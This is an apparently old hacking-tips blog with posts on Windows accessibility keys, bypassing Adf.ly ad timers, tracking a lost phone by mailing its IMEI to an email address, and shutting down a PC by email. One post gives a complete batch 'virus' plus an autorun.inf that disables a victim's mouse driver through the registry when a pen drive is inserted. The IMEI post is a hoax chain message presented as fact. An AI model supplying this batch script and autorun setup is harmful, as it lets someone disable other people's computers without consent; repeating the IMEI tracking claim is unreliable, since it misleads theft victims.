Categories

Friday, March 18, 2011

Use Mouse as Keyboard and Keyboard as Mouse in Windows

Use Mouse as Keyboard and Keyboard as Mouse

Windows XP gives you the option to work without mouse (with keyboard only) OR without Keyboard (using mouse only). This technique is useful when your mouse is not working or your keyboard is not working.
Work Without Mouse
Press ALT+Shift+Num Lock
You will hear a beep and then you can see windows asking for using MouseKeys. Click OK. You will see mouse like tray icon if it is crossed like this Use Mouse as Keyboard & Keyboard as Mouse then press Num Lock again. Now use the Numeric Keypad to move cursor around.
8 key for Up, 2 for down, 4 for left, 6 for right
When you want to use the Left click of mouse Press 5. For right click you can use this key on the keyboard.

The cursor moves very slow but you can speed it up. By pressing ALT+Shift+Num Lock you will see a dialogue click on setting again click settings, and then select hold down Ctrl to speed up and Shift slow down. Now when you want to move cursor then hold Ctrl and then press any key to move the cursor through numeric keypad. It will speed up now.
Work Without Keyboard
You can work with mouse click without keyboard.
Start -> RUN
Type osk
Hit Enter

keyboard-on-screen

You will see this keyboard called On-Screen Keyboard. To use any key, Click on any key. Usually this utility is made for mobility impaired users. But you use it if any of your key is not working at a moment.

Bypass/Hack Adf.ly - Url shortener service (Adf.ly Hack for Money)

Bypass/Hack Adf.ly - Url shortener service
As we all know, there are tons of ways for making money online. It may be Sharecash, self-hosted blog or any other url shortener like Adf.ly. Adf.ly pays bucks for each advertisement seen using your shortened link. The link viewer has to wait for 5 seconds until the advertisement loads and only after 5 seconds, he can view the actual intended page. So, I have today come up with a Adf.ly hack which helps you to bypass Adf.ly advertisement. By using this Adf.ly hack, you don't need to wait for counter to go to zero. You can simply bypass Adf.ly advertisements. I have provided the link for software download... just read on.



Try out this link: http://adf.ly/r0xP
You got a 5 seconds timer right??? Don't worry, henceforth, you will bypass this Adf.ly wait time.

Bypass/Hack Adf.ly Url shortener advertisements:

To bypass/hack Adf.ly, you need to have Firefox browser with Greasemonkey installed. You can install Greasemonkey firefox addon, if you haven't installed yet.

1. Go to Adf.ly Hacker script page to bypass/hack Adf.ly advertisements.

2. Hit on Install and confirm the script installation in your Greasemonkey.

Bypass/Hack Adf.ly url shortener service

3. Now, whenever you'll click on any Adf.ly shortened link(eg: http://adf.ly/r0xP ) , you won't see any timer or counter of 5 seconds. The actual intended page will appear.

That's it friends. This was a small hack by which you can bypass/hack Adf.ly url shortener advertisements and wait times. This hack to bypass Adf.ly has worked perfectly for me, hope it will help you all.

Found this hack working for you??? Share your reactions in comments.

Enjoy hack to bypass Adf.ly advertisements...

Tuesday, March 15, 2011

How To Track Lost Mobile (Get Back the Lost Mobile)

How To Track Lost Mobile

 

Now a days each one of us carry Mobile devices and always fear that it may be stolen. Did you ever lost your mobile and found no help from police or mobile operator in tracking your mobile? Well now you don’t need to be worried about it. Each mobile carries a unique IMEI i.e International Mobile Identity No which can be used to track your mobile anywhere in the world.
This is how it works!!!!!!
1. Dial *#06# from your mobile.
2. Your mobile shows a unique 15 digit .
3. Note down this no anywhere but except your mobile as this is the no which will help trace your mobile in case of a theft.
4. Once stolen you just have to mail this 15 digit IMEI no. to cop@vsnl.net
5. No need to go to police.
6. Your Mobile will be traced within next 24 hrs via a complex system of GPRS and internet.
7. You will find where your hand set is being operated even in case your no is being changed.
PASS ON THIS VERY IMPORTANT MESSAGE TO ALL YOUR FRIENDS AND RELATIVES.
If u lost your mobile, send an e-mail to cop@vsnl.netwith the following info.
Your name:
Address:
Phone model:
Make:
Last used No.:
E-mail for communication:
Missed date:
IMEI No.:

 

Check the New Indians Site http://www.indiaeveryday.in

Wednesday, March 2, 2011

Trick to make disable victim's mouse whenever he inserts pendrive........... Try it

Trick to Disable Victim's Mouse
This trick will make you disable victim's mouse whenever he inserts pen-drive. You can call it as virus which will disable the mouse.

This virus will be created using simple Batch programming. This post will not only offer you the code but also will also explain that Batch program.
-------------------------------------------------------------------------------------------------

@echo off
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
-------------------------------------------------------------------------------------------------
Explanation about this code

"@echo off" This command will either turn ON, or OFF the command you put in a batch file from showing itself on screen.

setkey="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass" will access the registry stored in the location"HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
The third line of our code is "reg delete %key%”. This will delete the key in the MouseClass from registry.

"reg add %key% /v Start /t REG_DWORD /d 4" creates a new key with
Binary value name as "start" ,type is "REG_DWORD"
and data as "4" (actually the four will be stored in hexadecimal format, 0×00000004).

The Procedure to create this virus:

Step 1: 
1. Copy the Batch code into notepad.
2. Save it as .bat extension (for eg: clickme.bat)

Step 2: 
Now open the notepad and copy this code:
------------------------------------------
[autorun]
Open=filename.bat
Action=Mouse Disable
-----------------------------------------
Save it as "autorun.inf"

//don't forget to change the "filname.bat" with your filname.bat.

Step 3: 
Then copy the two files in your pen drive or victim's pen drive.


That's all we have finished. Now make the victim to insert that infected pen drive and that’s all, now the victim’s mouse is disabled.

How to recover from this attack?
In case you yourself get infected with this attack then to recover from this attack, you can follow these simple steps:

Copy this code into the notepad:
-------------------------------------------------------------------------------------------------
@echo off
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 1
-------------------------------------------------------------------------------------------------

and save it with .bat extension(for eg: release.bat).
Now final step is to double click this batch will and it will re-enable the mouse actions.

ShutDown your Computer by ur cellphone

ShutDown your Computer by ur cellphone

Using this method, a user can shutdown, restart, hibernate, etc. his or her computer, just by sending an email from his or her phone.

To do this, all you will need is Microsoft
 Outlook which should come with Microsoft Office, which most people have. This will need to be on the computer wish you wish to shutdown.

So, this is how you do this:

1.
 First, you need the batch files to perform the Shutdown, Hibernate etc. You can write them down yourselves

2.
 open your note pad
and write like this...
c:\windows\system32\shutdown -s -f -t 00
and save it as shutdown.bat

3.
 Open up Microsoft Outlook. Make sure that you have already configured it for your email.Now we will need to make it so that Outlook checks your inbox about every minute (1 minute for testing time can be increased if a delayed shutdown is desired). You can do this by going to Tools: Options.

4.
 Then click the Mail Setup tab, and afterward, the Send/Receive button.

5.
 Make sure that the Schedule an automatic send/receive every... box is checked, and set the number of minutes to 1. Now you may close all of these dialog boxes.

6.
 Now go to Tools: Rules and Alerts... Next click the options button in the upper right hand corner and press the Import Rules button.

7.
 Now select the shutdown.bat file ...which u have created ...

8.
 Now, when you send a message from your phone to your e-mail address with the subject shutdown or smsshutdown%%, your computer will shutdown.

Tips:
Use of any of the Isolated or dead E-mail address or any e-mail will shutdown your computer.

I hope you like it 
by PrAjEsH
Please Comment about it